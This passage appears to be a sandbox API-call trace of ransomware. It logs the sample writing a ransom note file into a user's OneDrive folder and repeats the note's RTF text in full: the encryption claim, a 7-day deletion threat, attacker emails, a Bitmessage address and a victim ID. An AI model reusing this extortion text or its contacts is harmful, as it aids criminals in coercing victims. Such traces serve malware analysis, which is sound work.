\\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.985] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.986] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\";ÞÒ\x18\x06ýoÏ»Qò\x1bß°ÞbÜØ\x8f\x8cÍ|\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0298.986] WriteFile (in: hFile=0x27c, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.986] CloseHandle (hObject=0x27c) returned 1 [0298.986] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ms\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ms\\#readme_eman#.rtf")) returned 0xffffffff [0298.986] GetLastError () returned 0x2 [0298.986] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ms\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ms\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.988] WideCharToMultiByte (in: 